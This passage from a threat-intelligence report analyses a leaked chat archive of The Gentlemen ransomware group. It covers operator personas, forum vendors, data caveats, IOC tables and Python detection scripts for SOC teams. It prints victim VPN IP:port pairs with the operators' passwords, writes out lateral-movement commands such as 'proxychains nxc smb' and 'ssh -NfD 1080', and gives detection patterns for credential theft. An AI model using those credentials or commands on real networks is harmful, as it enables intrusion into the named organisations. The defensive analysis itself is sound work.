What this means operationally: Organisations previously targeted by Black Basta should treat The Gentlemen as a continuation of the same threat for the purposes of risk assessment, threat modelling, and defensive prioritisation. Victim target lists, access brokers, infrastructure providers, and operational playbooks appear to have carried over. The Conti → Black Basta → The Gentlemen lineage represents one of the longest-running and most prolific strands of Russian-speaking ransomware operations, now in its third known iteration.
8.4 hastalamuerte / zeta88 — Operational Identity and Origin
External reporting from Group-IB, HivePro, Check Point, Cybereason, and Proven Data has established the following origin story, which the leaked corpus now corroborates from the inside:
Origin: On July 22, 2025, hastalamuerte opened a public arbitration thread on the RAMP forum, accusing Qilin's operators of a $48,000 USD payment dispute over unpaid affiliate commission. After this public dispute, hastalamuerte formalized an already-planned departure and launched The Gentlemen ransomware as an independent brand, reusing proven tooling and infrastructure from previous operations.
Prior affiliations: Hastalamuerte was an experienced affiliate who had previously worked with Embargo, LockBit, and Medusa before joining Qilin. Before becoming a RaaS, this operation was known as ArmCorp, a very active Qilin affiliate group. The name ArmCorp was present in the page title of the group's Rocket.Chat instance.
Launch under dual aliases: The Gentlemen RaaS was formally advertised on underground forums on September 12, 2025 under the alias “Zeta88,” promoting a minimal-infrastructure model consisting of a leak site plus Tox messenger and a cross-platform locker. This confirms that hastalamuerte and zeta88 are publicly linked identities used by the same operation — hastalamuerte as the business/recruitment persona, zeta88 as the technical operator alias.

Scale: The group maintains an operational database of approximately 14,700 already exploited FortiGate devices globally, plus 969 validated brute-forced FortiGate VPN credentials ready for attack. The Gentlemen reached third place on the global ransomware list in Q1 2026, increasing their victim count from 40 in Q4 2025 to 166 in Q1 2026.
Analyst caveat: This is an unverified operator claim made in internal chat and may represent significant exaggeration or bragging; ransomware operators routinely inflate their track records in peer conversations to establish credibility.
Revenue model: The group offers affiliates an aggressive 90/10 revenue split, well above the ransomware industry norm of 80/20, along with full control over victim negotiations.
Within the leaked corpus, hastalamuerte appears in two contexts:
- Third-party messenger conversation with tank (room 724140) discussing Devman's targets
- Credential delivery in room 893402: zeta88 pastes a message formatted as “[16:25:02] hastalamuerte: Domain: https://[REDACTED].okta.com” — a copy-paste from an external platform relaying the victim's Okta credentials with 71 app assignments
Assessment: Based on the external reporting confirming that the RaaS was advertised under the alias “Zeta88” and managed by “hastalamuerte,” combined with the corpus evidence showing zeta88 forwarding hastalamuerte's credential drops into internal channels, the most likely interpretation is that these are two operational personas used by the same individual or a tightly integrated pair. hastalamuerte handles external forum presence, recruitment, and access brokering (T1erone, formerly RAMP), while zeta88 operates the internal Rocket.Chat infrastructure (1,891 messages, 18 of 22 rooms).

Source: HivePro
8.5 RaaS Program Discussion
A conversation in room 302930 (April 21, 2026) reveals the group's self-positioning within the RaaS ecosystem. qbit posts a list of programs:
Gunra / Hyflock / ShadowByt3$ RAAS / The Gentlemen's / Anubis / CHAOS / Dragon Force
zeta88 responds with candid assessments and concludes: “If I were choosing where to go myself — only these two programs out of ALL presented” (referring to DragonForce and The Gentlemen), adding: “I know they pay DragonForce, and they pay adverts… And about us you know everything yourself.”
qbit follows up: “I advertised The Gentlemen to him as best I could. He's thinking about it.”
8.6 Forum Vendor: Avoid
Forum screenshots show user Avoid selling Cisco VPN checkers ($700) and advertising bruteforce tools for Fortinet, SonicWall, Check Point, and others: “Time-tested software for over 15 years in the vx-team.”

Forum vendor “Avoid” — Cisco VPN checker and brute-force tool listings

User Avoid on Ramp seeking exploits for CVE-2025-32433
In the group chats this user is referenced twice:
- Tinkoff QR codes (zeta88) — Russian bank fiat cashout
- “скупов” (зета88) — generic Russian term for crypto cash-out buyers/OTC traders
We assess with high confidence that the user Avoid is or is closely associated with Zeta88.
8.7 Forum Vendor: MonicaLewinsky and perfect
Exploit Forum screenshots show:
MonicaLewinsky offering a corporate call center service for social engineering

perfect seeking English-speaking callers for corporate phishing operations ($2,000 budget)

Forum vendors “MonicaLewinsky” and “perfect” — corporate call center and social engineering services
9. Data Integrity, Assumptions & Analytical Caveats
This section documents the assumptions, limitations, and integrity considerations underpinning this report. Readers should interpret all findings within these boundaries.
9.1 Data Provenance and Integrity
The leaked archive was first offered for sale on May 5, 2026 by “n345,” an account with zero prior reputation on PwnForums (created May 2026, 2 posts). The same user released the data freely on CryptBB three days later. The leaker's identity, motive, and method of acquisition remain unverified. Possible origins include a disgruntled insider, a competing ransomware group, a security researcher, or a law enforcement operation — each carrying different implications for data reliability.
We assess the corpus as predominantly authentic based on the following indicators:
- Internal consistency across 22 room exports: timestamps, usernames, operational references, and cross-room citations are coherent and mutually reinforcing
- The Gentlemen publicly confirmed the Rocket.Chat compromise on May 4, 2026, acknowledged the leaked password is genuine, and attributed the breach to the 4VPS hosting provider incident
- Victim identities, domain names, and network artifacts extracted from the chats correlate with independently verifiable data (RansomLook DLS records, public corporate information, FortiGate device fingerprints)
- Operational artifacts (screenshots, configuration dumps, tool paths) contain internally consistent metadata (timestamps, filesystem structures, browser state) that would be extremely difficult to fabricate at scale
- The level of mundane operational detail (hardware shopping, payment disputes, frustrated troubleshooting) is consistent with genuine internal communications rather than constructed narratives
However, the following integrity risks cannot be fully excluded:
- Selective omission: The leaker may have withheld rooms or messages that would alter analytical conclusions. The absence of major operational channels (PODBOR, TOOLS, PHISHING, general) confirms the export is selective — whether by access limitation or deliberate curation is unknown
- Targeted insertion: Individual messages or screenshots could theoretically have been injected into the CSV exports prior to release. No cryptographic signatures or Rocket.Chat export verification hashes accompany the data
- Timestamp manipulation: CSV-based exports lack server-side integrity guarantees. While timestamps are internally consistent, they could have been systematically shifted or selectively edited
- Screenshot provenance: Screenshots are not cryptographically bound to the chat logs. They could originate from different timeframes, different actors, or different operations than the room exports suggest
9.2 Corpus Coverage Limitations
The 22 exported Rocket.Chat rooms represent a partial window into a significantly larger operation:
- The group has been active since at least July/August 2025, with the first public DLS post on September 9, 2025. The corpus covers only November 2025 through late April 2026 — approximately 6 months of a 10+ month operation
- RansomLook records attribute 400+ publicly claimed victims to The Gentlemen. The 66 confirmed victims identified in this corpus represent approximately 16% of the known victim pool
- At least 15 operational channels referenced in chat messages were not included in the export (PODBOR, INFO, general, TOOLS, PHISHING, and 10+ victim-specific group channels). The actual volume of internal communications is likely an order of magnitude larger than the 3,366 messages analysed
- The exported rooms skew toward operator/affiliate DM pairs rather than functional channels, meaning targeting pipelines, phishing operations, and infrastructure management are underrepresented
Consequently, all quantitative findings in this report (victim counts, tool mention frequencies, message volumes) should be treated as lower bounds, not comprehensive totals.
9.3 Analytical Assumptions
The following assumptions are applied throughout this report:
- Attribution of usernames to roles is based on message content, volume, room presence, and behavioural patterns — not on verified real-world identities. A single person may operate multiple accounts, or multiple people may share an account
- Tool references do not confirm deployment. A GitHub link shared in chat indicates awareness and possible intent, not confirmed operational use, unless corroborated by screenshots, victim artifacts, or verbatim deployment commands
- Operator claims are not taken at face value for financial figures, victim counts, or capability assertions unless independently corroborated. Where unverified claims are included (e.g., zeta88's “800 BTC” cash-out history), they are presented as operator statements, not confirmed facts
- Geographic and cultural inferences (e.g., language patterns, AI tool preferences, greeting customs) are noted as circumstantial indicators only and do not constitute attribution. Multiple explanations exist for each such observation
- Victim identification relies on domain names, IP addresses, hostnames, and ZoomInfo references found in the corpus. In some cases, generic hostnames or common infrastructure could lead to misattribution. Confidence tiers for individual victims are documented in the separate Victim Dossier
- RansomLook cross-referencing is based on domain-level matching against public API data. Victims not publicly claimed on a DLS, or claimed under variant spellings/domains, may not appear in the overlap analysis
9.4 Classification and Handling
This report is intended for public release with the exception of the Internal/LEA Victimology Pack (linked separately), which contains unredacted victim identifiers, network artifacts, and credential material restricted to law enforcement and vetted incident response partners. Indicators of compromise (Bitcoin addresses, Tox IDs, .onion addresses, file hashes) are included in the public version to enable defensive action.
10. Conclusion and Outlook
The compromise of The Gentlemen's Rocket.Chat infrastructure provides one of the most granular views into a mid-tier RaaS operation to date. Across 3,366 messages and 22 exported rooms, the leaked corpus exposes the full operational lifecycle — from Fortinet target scanning and CVE exploitation through credential harvesting, lateral movement, data exfiltration, and ransomware deployment — executed by a tightly entangled network of at least 9 operators.
What distinguishes this leak is the degree of interconnection it reveals. Members do not operate in isolation: zeta88 orchestrates across 18 of 22 rooms, forwarding credentials from hastalamuerte's external brokering, coordinating with qbit on infrastructure and exploit sourcing, tasking Protagor and Wick on intrusions, and managing Kunder's sub-team for G-BOT development and Fortinet exploitation. The room structure itself — DM pairs, per-victim channels, shared tooling discussions — maps a professional division of labor modeled on legitimate software operations, complete with custom C2 development (G-BOT), competitive benchmarking against rival RaaS programs, and AI-assisted negotiation workflows.
Critically, this is only a partial leak. The 22 exported rooms represent a fraction of the group's operational infrastructure. Key channels — including PODBOR (target selection, referenced 10 times), PHISHING (21 references), TOOLS, and at least 11 per-victim group channels — were not included in the export. The 66 independently confirmed victims are therefore a lower bound; the group's internal victim database, maintained in the undumped PODBOR channel, is almost certainly larger. The group itself dismissed the leak as “indeed very partial — which is actually sad,” and the evidence supports that characterization.
Despite this partial window, the corpus uncovers operational secrets that would ordinarily remain invisible: group-branded VPN passwords reused across victims, hardware procurement from Russian consumer marketplaces, infrastructure linkages to Black Basta's Matrix homeserver, active monitoring of their own leak-site rankings, and candid competitive assessments of rival RaaS programs. The group's response — announcing locker improvements, new NAS infrastructure, and operational continuity within hours — signals an organization that treats exposure as a temporary inconvenience rather than an existential threat.
For the CTI community, this leak provides actionable intelligence at every layer: network defenders gain detection signatures and IOCs; law enforcement gains identity linkages and infrastructure mappings; and the broader security community gains insight into how a modern RaaS operation scales from 40 victims in Q4 2025 to over 160 in Q1 2026. The Gentlemen remain operationally active. The caravan, as they put it, moves on — but it now moves in considerably more light.
11. Responsible Disclosure Considerations
The leaked data contains active credentials for multiple organisations. Affected entities have been identified and coordinated disclosure is underway through appropriate national CERT channels and relevant international law enforcement partners.
12. Open Questions
12.1 Who Is the Leaker?
The n345 account had zero reputation on PwnForums (created May 2026, 2 posts). The three-day gap between the $10K sale attempt and the free release suggests either no buyer materialised or the monetisation was performative. Most critically, The Gentlemen posted their response on May 4 — one day before n345's public sale post — implying advance warning, prior contact from the leaker, or private circulation of the data before the forum posts. The selective omission of major channels (PODBOR, PHISHING, TOOLS) could reflect access limitations from the 4VPS compromise, or deliberate filtering — but by whom, and to what end?
12.2 G-BOT Provenance
The G-BOT Control Panel shows significant development investment — web UI, beacon management, per-beacon SOCKS5, a builder with payload hosting integration. The PID file path /var/run/gbot_root.pid does not match any known public C2 framework. Is this a ground-up custom build by Kunder, a heavily modified fork of a lesser-known framework, or a purchased tool? The absence of any public match for its distinctive artifacts leaves this unresolved.
12.3 bestflowers247.online — Full Attribution
Cloudflare Cloudforce One attributes this Matrix homeserver to Black Basta. The Gentlemen's operators possessed screenshots from it. The Matrix handles (@usernamegg, @lapa, Tinker) perform the same operational functions visible in the Black Basta leaked corpus. But the full domain-to-infrastructure attribution chain — registration history, hosting overlaps, certificate linkages — has not been independently published. Can this homeserver be confirmed as Black Basta infrastructure through sources independent of the Cloudflare reporting?
12.4 Systematic Re-Victimisation
One confirmed cross-group case exists (South African municipality: LockBit5 December 2025, The Gentlemen March 2026). DeadBolt and DiskStation Security ransom notes appear on NAS devices The Gentlemen subsequently accessed. Is the group deliberately targeting previously compromised organisations — leveraging weak security posture and demonstrated willingness to pay — or is this coincidental overlap driven by the same vulnerable device populations? zeta88's awareness of a victim's prior payment history during negotiations (“your organisation already pay 100k for some group”) suggests at minimum that prior compromise history informs their strategy, even if deliberate re-targeting is not yet confirmed.
12.5 hastalamuerte Cross-Group Activity
The serial affiliate path (Embargo → LockBit → Medusa → Qilin → The Gentlemen) is documented. The open question is whether hastalamuerte maintains simultaneous affiliations — functioning as an access broker selling to multiple RaaS programs concurrently rather than moving sequentially between them. The $48K Qilin payment dispute provides a public departure timestamp, but it does not exclude ongoing relationships with other programs. If confirmed, it would mean that a single operator's target pipeline feeds multiple ransomware brands, and that disrupting one brand does not eliminate the underlying threat.
12.6 DiskStation & DeadBolt — Prior Compromise Indicators
Both pre-existing ransom note wallet addresses on NAS devices accessed by The Gentlemen show zero transactions — the original victims did not pay. Are The Gentlemen systematically scanning for devices with existing ransom notes as indicators of weak security posture, or is this incidental to their broader NAS exploitation campaign? The PODBOR channel, if it surfaces, would likely resolve this.
13. Infrastructure and IOCs
13.1 Onion Addresses
| Address | Purpose |
|---|---|
| xcsqtdobtmdhsjkyjz6iydfowh7bps5dd3a2xg53oirylnohednc4syd.onion | Rocket.Chat server (internal comms) |
| tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion | Data Leak Site (DLS) — referenced in ransom notes with 293-hour countdown |
| doppelr7lmomssd6sy3g4qm3wnioighzhmygg5yqyi4asfgnhqhl65id.onion | Referenced once in chat |
| nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad.onion | Proxy service |
Other .onion addresses referenced (role unknown / inferred)
The following additional Tor endpoints are referenced in the corpus; roles below are best-effort inferences based on URL structure and naming and should be treated as tentative.
| Onion | Likely role (inferred) |
|---|---|
| doppelr7lmomssd6sy3g4qm3wnioighzhmygg5yqyi4asfgnhqhl65id.onion/auth/login | Auth panel. May be a service login page (e.g., phishing-kit admin panel, escrow, or another third-party portal); not enough context in the leak to confirm. |
| nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad.onion/ | Proxy service (“nsocks” naming suggests SOCKS/proxy provisioning or resale). |
| tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion/ | Gentlemen data leak site (DLS). Root-path access referenced in addition to ransom-note URL usage. |
13.2 Operator VPN Credentials (for victim access)
| IP:Port | Password | Room |
|---|---|---|
| 14.99.248.6:10443 | gentlemen25 | 217109 |
| 183.66.149.70:8443 | Gentlemen25 | 945300 |
| 102.212.53.2:10443 | gentle26 | 843543 |
| 202.21.110.114:4433 | gentle26 | 662502 |
| 212.186.182.179:10443 | (user: staudenherz) | 251173 |
13.3 Malware Hashes
| File | Hash | Type |
|---|---|---|
| SetupGps2.exe | 91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f | SHA-256 |
| SetupGps2.exe | bdfae4ff271414df8db7bfd255cf603e | MD5 |
| SetupGps2.exe | fe06486c3f74b317d7ec5cc9be8915c34a07a68f | SHA-1 |
13.4 Crypto Indicators
| Type | Value |
|---|---|
| Group Tox ID (ransom notes) | F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E |
| Leaker Tox ID (sale post) | 7862AE03A73AAC2994A61DF1F635347F2D1731A77CACC155594C6B681D201F7AD6817AD3AB0A |
| BTC address (payment context) | 1CgfAohwbTSYsyxPvphdcrcfSd1XE5C8Rr |
| BTC address (DeadBolt Team ransom note) | BC1Q3ADZE9H3U5E8KX9ZWJ5TUW0DN0PQ28F26XGPVQ |
| BTC address (DiskStation Security ransom note) | bc1qgl29fwvpaky7vr94qwufeq56d00l5h60fe7utx |
| Contact email (DiskStation Security ransom note) | [email protected] |
| BTC transaction (operator-shared) | 7e366683f1d175278feefaaa35d87e87076931974506b9f373a775a428c28f10 |
| Recommended Wallets | Guarda, Trust Wallet, Exodus |
| Zeta88 BTC Address | 17U3tN7hzwYwwya8qkyZgnG9jy3unHG7xL |
Note: “Diskstation Security” and “DeadBolt Team” note brands were observed in screenshots on victim systems and are not otherwise present as The Gentlemen branding in the chat corpus.
13.5 File Indicators
| Indicator | Description |
|---|---|
| README-GENTLEMEN.txt | Ransom note filename |
| .i8p14s | Encrypted file extension |
| /opt/updateamd | Linux/NAS locker binary path |
| /var/run/gbot_root.pid | G-BOT C2 PID file |
| G-BOT Control Panel | C2 panel page title |
| FOBOSLOADER | Initial access loader |
13.6 Operator Desktop Artifacts
Browser tabs and bookmarks observed on operator screenshots:
- Vaultwarden (password manager)
- zabbix-mol/Dashboard (monitoring)
- SA6400 - Synology NAS (bookmarked)
- RAZBOR (bookmarked — “analysis” in Russian)
- FIRSTMAIL (bookmarked)
14. Defensive Recommendations and Detection Guidance
The following recommendations are derived directly from the TTPs, tooling, and infrastructure patterns documented in this report. They are designed to be actionable for SOC teams, threat hunters, and infrastructure owners — particularly those running Fortinet perimeter devices.
14.1 Perimeter Hardening (Fortinet Priority)
- Patch CVE-2024-55591 immediately. This is the group's confirmed primary initial access vector. All FortiOS/FortiProxy versions affected by this authentication bypass must be updated. See Fortinet PSIRT advisory FG-IR-24-535.
- Rotate all FortiGate local user passwords and LDAP bind credentials. The leak demonstrates that FortiGate configuration exports containing plaintext passwords and LDAP bind DNs are routinely shared between affiliates. If your FortiGate config has ever been exported or backed up to a potentially compromised system, treat all embedded credentials as burned.
- Audit FortiGate SSL VPN access logs for connections using `openconnect --protocol=fortinet` with the `root` username and passwords matching the group's convention: `gentlemen25`, `Gentlemen25`, `gentle26`. These are reused across unrelated victims.
- Disable or restrict SSL VPN access to known IP ranges where possible. The group connects via Tor, Amnezia VPN, and SOCKS proxy chains — connections from anonymising infrastructure to SSL VPN endpoints on non-standard ports (`:10443`, `:8443`, `:4433`) are high-confidence indicators.
- Review `config user ldap` stanzas in FortiGate configurations for plaintext bind passwords. Rotate any LDAP service account credentials found there and restrict bind account permissions to read-only minimum.
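The two audits above can be scripted against a log export and a configuration backup. The following is an added example written for this report section; it is not code from the report, from RansomLook, or from Fortinet. It parses FortiGate-style `key=value` event logs and flags SSL VPN `tunnel-up` events for the `root` user or from a constructed anonymiser range, then walks a `config user ldap` block to list every bind account (all of which need rotation if the export was ever shared) and reports whether the password is stored as an `ENC` blob or in plaintext, and reads the listener port from `config vpn ssl settings`. The log field names (`subtype`, `action`, `user`, `remip`) are assumptions modelled on FortiGate's event/vpn log category and should be checked against the log reference for your firmware; all sample log lines and the sample configuration are constructed.

```python
import re
import ipaddress

# FortiGate writes logs as key=value pairs, quoting values that contain spaces.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

def parse_kv(line):
    """Split one key=value log line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

# Constructed placeholder; feed it Tor exit and VPN-provider ranges in production.
ANONYMISER_NETS = [ipaddress.ip_network("203.0.113.0/24")]

def is_anonymiser(ip):
    try:
        return any(ipaddress.ip_address(ip) in net for net in ANONYMISER_NETS)
    except ValueError:
        return False

def triage_sslvpn_events(lines):
    """One finding per SSL VPN tunnel-up event that matches a Section 14.1 indicator.
    Field names (subtype, action, user, remip) are assumed from FortiGate's event/vpn
    log category; check them against the log reference for your firmware."""
    findings = []
    for line in lines:
        ev = parse_kv(line)
        if ev.get("subtype") != "vpn" or ev.get("action") != "tunnel-up":
            continue
        reasons = []
        if ev.get("user", "").lower() == "root":        # the group's openconnect -u root
            reasons.append("root-login")
        if is_anonymiser(ev.get("remip", "")):
            reasons.append("anonymiser-source")
        if reasons:
            findings.append({"time": ev.get("time", "?"), "user": ev.get("user", "?"),
                             "remip": ev.get("remip", "?"), "reasons": ",".join(reasons)})
    return findings

def _block(config_text, header):
    """Yield the stripped lines of one top-level 'config ...' block up to its 'end'."""
    inside = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if line == header:
            inside = True
        elif inside and line == "end":
            return
        elif inside:
            yield line

def audit_ldap_stanzas(config_text):
    """Each 'config user ldap' bind account and how its password is stored. Every account
    listed needs rotation if the export ever left the device; PLAINTEXT (no ENC blob)
    is the form the report describes being passed between affiliates."""
    stanzas, cur = [], None
    for line in _block(config_text, "config user ldap"):
        m = re.match(r'edit "(.*)"$', line)
        if m:
            cur = {"name": m.group(1), "server": "", "bind_dn": "", "password": "none"}
        elif line == "next" and cur:
            stanzas.append(cur)
            cur = None
        elif cur and (s := re.match(r"set (\S+) (.*)", line)):
            key, value = s.groups()
            if key == "server":
                cur["server"] = value.strip('"')
            elif key == "username":
                cur["bind_dn"] = value.strip('"')
            elif key == "password":
                cur["password"] = "ENC" if value.startswith("ENC ") else "PLAINTEXT"
    return stanzas

def sslvpn_listener_port(config_text):
    """SSL VPN listener port from 'config vpn ssl settings' (FortiOS default is 443)."""
    for line in _block(config_text, "config vpn ssl settings"):
        if line.startswith("set port "):
            return line.split()[2]
    return "443"

# Constructed sample data (not from the leak).
SAMPLE_LOGS = [
    'date=2026-03-09 time=21:14:02 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-tunnel" user="root" remip=203.0.113.7 msg="SSL tunnel established"',
    'date=2026-03-09 time=08:02:11 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-tunnel" user="jdoe" remip=198.51.100.4 msg="SSL tunnel established"',
]
SAMPLE_CONFIG = """\
config vpn ssl settings
    set port 10443
end
config user ldap
    edit "ldap-corp"
        set server "10.20.0.5"
        set username "cn=svc-fortigate,ou=svc,dc=corp,dc=example"
        set password ENC AAAAexampleblob==
    next
    edit "ldap-legacy"
        set server "10.20.0.6"
        set username "cn=svc-ldap,dc=corp,dc=example"
        set password "Winter2025!"
    next
end
"""
```

Run `triage_sslvpn_events` over a `tunnel-up` log export and `audit_ldap_stanzas` over the backup you would otherwise hand to a support vendor; a listener port of 10443, 8443 or 4433 returned by `sslvpn_listener_port` is the exposure the report describes, not evidence of compromise by itself.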
14.2 Network Detection — Lateral Movement and Pivoting
- Monitor for SOCKS proxy traffic on non-standard ports. The group uses external SOCKS5 proxies (e.g., port `36067`) and G-BOT beacon SOCKS ports (`30001`, `30002`). Alert on internal hosts establishing SOCKS connections to external IPs on unusual ports, particularly when correlated with subsequent SMB enumeration.
- Detect `proxychains` + `nxc` patterns. The group's primary lateral movement pattern is `proxychains nxc smb <subnet>/24` — mass SMB enumeration routed through proxy chains. Look for:
  - Rapid sequential SMB connection attempts across a /24 from a single source
  - SMB auth attempts using the same credential pair against many hosts in rapid succession
  - Network traffic consistent with proxy-chained connections (SOCKS handshake followed by SMB)
- Alert on SSH dynamic port forwarding. The command `ssh -NfD 1080` opens a local SOCKS proxy on port 1080. Monitor for SSH sessions with no interactive shell (the `-N` flag) and subsequent traffic routed through `127.0.0.1:1080`.
- Watch for `chisel`/`chisel-ng` tunnels. These create TCP/SOCKS tunnels over HTTP. Detect by monitoring for long-lived HTTP connections with bidirectional data transfer patterns inconsistent with normal web traffic.
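The first two `proxychains nxc smb` sub-bullets are the ones that translate most directly into detection logic. The block below is an added example for this section, not code from the report or from any vendor; it runs the two checks over constructed flow and SMB authentication records. `smb_sweeps` groups TCP/445 flows by source and destination /24 and alerts when one source reaches many distinct hosts inside a short window; `credential_fanout` does the same for one (source, username) pair tried against many hosts, which is what NetExec spraying a single credential pair across a subnet looks like. The record shapes are assumptions; map your own flow and Windows logon telemetry onto them, and tune the thresholds to your network size.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

def max_distinct_in_window(events, window):
    """events: list of (timestamp, value). Largest number of distinct values seen inside
    any span of length `window` (sliding window over the time-sorted events)."""
    events = sorted(events)
    best = 0
    for i, (t0, _) in enumerate(events):
        seen = set()
        for t, value in events[i:]:
            if t - t0 > window:
                break
            seen.add(value)
        best = max(best, len(seen))
    return best

def smb_sweeps(flows, min_hosts=8, window=timedelta(seconds=30)):
    """flows: (ts, src_ip, dst_ip, dst_port). Alert when one source opens TCP/445 to
    >= min_hosts distinct hosts in the same /24 within `window`, which is how
    'proxychains nxc smb <subnet>/24' looks from inside the network."""
    by_key = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport != 445:
            continue
        subnet = str(ipaddress.ip_network(f"{dst}/24", strict=False))
        by_key[(src, subnet)].append((ts, dst))
    return [(src, subnet, n) for (src, subnet), ev in by_key.items()
            if (n := max_distinct_in_window(ev, window)) >= min_hosts]

def credential_fanout(auths, min_hosts=8, window=timedelta(seconds=60)):
    """auths: (ts, src_ip, dst_ip, username, success). Alert when one (source, user) pair
    is tried against >= min_hosts distinct hosts within `window`, regardless of outcome;
    the successes in such a burst are the hosts the operator now owns."""
    by_key = defaultdict(list)
    for ts, src, dst, user, _ok in auths:
        by_key[(src, user.lower())].append((ts, dst))
    return [(src, user, n) for (src, user), ev in by_key.items()
            if (n := max_distinct_in_window(ev, window)) >= min_hosts]

BASE = datetime(2026, 3, 10, 14, 0, 0)
# Constructed flow records (not from the leak): a sweep of 10.0.1.0/24 from 10.0.5.23,
# one host talking repeatedly to a single file server, and an unrelated HTTPS flow.
FLOWS = [(BASE + timedelta(seconds=i), "10.0.5.23", f"10.0.1.{i + 1}", 445) for i in range(12)]
FLOWS += [(BASE + timedelta(minutes=m), "10.0.5.40", "10.0.1.50", 445) for m in range(5)]
FLOWS += [(BASE + timedelta(seconds=3), "10.0.5.23", "10.0.2.5", 443)]
# Constructed SMB authentication records: one domain account tried across the whole sweep.
AUTHS = [(BASE + timedelta(seconds=i), "10.0.5.23", f"10.0.1.{i + 1}", "CORP\\itadmin", i % 3 == 0)
         for i in range(12)]
AUTHS += [(BASE + timedelta(hours=1), "10.0.5.40", "10.0.1.50", "CORP\\jdoe", True)]

if __name__ == "__main__":
    print("SMB sweeps:", smb_sweeps(FLOWS))
    print("Credential fan-out:", credential_fanout(AUTHS))
```

The sweep detector keys on the destination /24 rather than on raw connection count, so a backup server that talks to fifty hosts spread across the estate over a day does not trip it, while twelve hosts in one subnet in twelve seconds does.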
14.3 Endpoint Detection — File and Process Indicators
| Indicator | Type | Detection Logic |
|---|---|---|
| README-GENTLEMEN.txt or README-GENTLEMEN | File creation | Alert on creation of files matching this pattern in any directory. High-confidence ransomware indicator. |
| .i8p14s file extension | File rename | Alert on mass file rename operations appending this extension. Indicates active encryption. |
| /opt/updateamd | File creation (Linux/NAS) | Alert on creation or execution of this binary path on Linux/NAS systems. This is the group's locker binary. |
| /var/run/gbot_root.pid | File creation (Linux) | PID file for the G-BOT C2 implant. Presence indicates active C2 beacon. |
| G-BOT Control Panel (page title) | HTTP response | If observed in internal network traffic, indicates C2 panel hosted on compromised or operator-controlled infrastructure. |
| XenAllPasswordPro.exe | Process / file | Mass credential harvester deployed via SMB. Alert on execution or staging in C:\Windows\Temp\. |
| Mozilla NSS DLLs in C:\Windows\Temp\ | File staging | Alert on freebl3.dll, mozglue.dll, nss3.dll, softokn3.dll appearing in temp directories — indicates Firefox/Thunderbird credential extraction. |
| SetupGps2.exe (SHA-256: 91017846...) | File hash | Known malicious binary. Only detected by CrowdStrike Falcon at time of leak; add hash to EDR blocklists. |
| DLL names: EAAntiCheat1.exe.dll, Valorant.exe.dll, Sophos.exe.dll, Avast.exe.dll | File name | AV-evasion masquerading. Alert on DLL files using these names outside their expected installation paths. |
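As an added example for this table (not code from the report or any EDR vendor), the block below encodes the file indicators above as a classifier for individual endpoint events and adds the one stateful check the table calls for: a per-host count of renames appending `.i8p14s` inside a sliding window, the "active encryption" signal. The event dictionary shape (`host`, `ts`, `kind`, `path`, `new_path`, `sha256`) is an assumption; the telemetry is constructed. The masquerading DLL names are tagged wherever they appear, so a real deployment should first baseline where those files legitimately live before alerting on that tag.

```python
import fnmatch
import ntpath
import posixpath
from collections import defaultdict
from datetime import datetime, timedelta

# Static indicators from the Section 14.3 table.
RANSOM_NOTE_GLOB = "readme-gentlemen*"
ENCRYPTED_EXT = ".i8p14s"
LINUX_PATHS = {"/opt/updateamd": "locker-binary", "/var/run/gbot_root.pid": "gbot-pid-file"}
NSS_DLLS = {"freebl3.dll", "mozglue.dll", "nss3.dll", "softokn3.dll"}
MASQUERADE_DLLS = {"eaanticheat1.exe.dll", "valorant.exe.dll", "sophos.exe.dll", "avast.exe.dll"}
KNOWN_SHA256 = {"91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f": "SetupGps2.exe"}
STAGING_DIR = r"c:\windows\temp"

def basename(path):
    """Basename for either Windows or POSIX paths."""
    return ntpath.basename(path) if "\\" in path else posixpath.basename(path)

def classify_event(ev):
    """Indicator tags matched by one file or process event (empty list = no match).
    Keys used: path (required), sha256 (optional)."""
    path = ev.get("path", "")
    name = basename(path).lower()
    tags = []
    if fnmatch.fnmatchcase(name, RANSOM_NOTE_GLOB):
        tags.append("ransom-note")
    if path in LINUX_PATHS:
        tags.append(LINUX_PATHS[path])
    if name in NSS_DLLS and ntpath.dirname(path).lower() == STAGING_DIR:
        tags.append("nss-dll-staging")      # Firefox/Thunderbird credential theft staging
    if name == "xenallpasswordpro.exe":
        tags.append("credential-harvester")
    if name in MASQUERADE_DLLS:
        tags.append("masquerade-dll")       # baseline legitimate install paths first
    digest = ev.get("sha256", "").lower()
    if digest in KNOWN_SHA256:
        tags.append("known-hash:" + KNOWN_SHA256[digest])
    return tags

def mass_rename_alerts(events, threshold=50, window=timedelta(seconds=60)):
    """{host: peak} for hosts where >= threshold renames appending .i8p14s fall inside
    any `window` (two-pointer sliding window over the sorted timestamps)."""
    per_host = defaultdict(list)
    for ev in events:
        if ev.get("kind") == "rename" and ev.get("new_path", "").lower().endswith(ENCRYPTED_EXT):
            per_host[ev["host"]].append(ev["ts"])
    alerts = {}
    for host, times in per_host.items():
        times.sort()
        j, peak = 0, 0
        for i, t in enumerate(times):
            while t - times[j] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            alerts[host] = peak
    return alerts

def run(events):
    """Flat list of (host, tag) static matches plus the mass-rename alerts."""
    static = [(ev["host"], tag) for ev in events for tag in classify_event(ev)]
    return static, mass_rename_alerts(events)

# Constructed telemetry (not from the leak).
BASE = datetime(2026, 3, 10, 2, 15, 0)
SAMPLE_EVENTS = [
    {"host": "nas01", "ts": BASE, "kind": "create", "path": "/opt/updateamd"},
    {"host": "ws17", "ts": BASE, "kind": "create", "path": r"C:\Windows\Temp\nss3.dll"},
    {"host": "ws17", "ts": BASE, "kind": "create", "path": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
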